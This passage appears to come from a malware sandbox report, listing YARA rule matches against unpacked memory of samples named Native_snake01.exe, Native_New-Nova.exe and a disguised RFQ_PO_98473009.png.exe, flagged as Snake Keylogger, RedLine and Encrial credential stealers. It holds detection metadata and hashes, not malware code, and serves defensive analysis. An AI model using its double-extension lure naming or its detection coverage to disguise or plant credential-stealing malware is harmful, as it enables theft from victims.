                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.5100000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.25a0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70f20.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70000.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3640190.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 18.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 9.2.RFQ_PO_98473009.png.exe.27b4740.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.21b183e.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.2520f08.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.49c0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.3.Native_snake01.exe.5e03c0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e5570.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3615570.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.21c02f6.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.3.Native_New-Nova.exe.55fec8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3616478.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.4a70f20.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.2.Native_New-Nova.exe.3640190.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.2.Native_snake01.exe.4a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc02f6.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc1216.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.34e6478.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 10.3.Native_New-Nova.exe.7693e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 12.0.Native_snake01.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: 19.2.Native_snake01.exe.1fc1216.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                      Source: 10.0.Native_New-Nova.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 18.2.Native_New-Nova.exe.4a60000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                      Source: 19.2.Native_snake01.exe.4a70000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
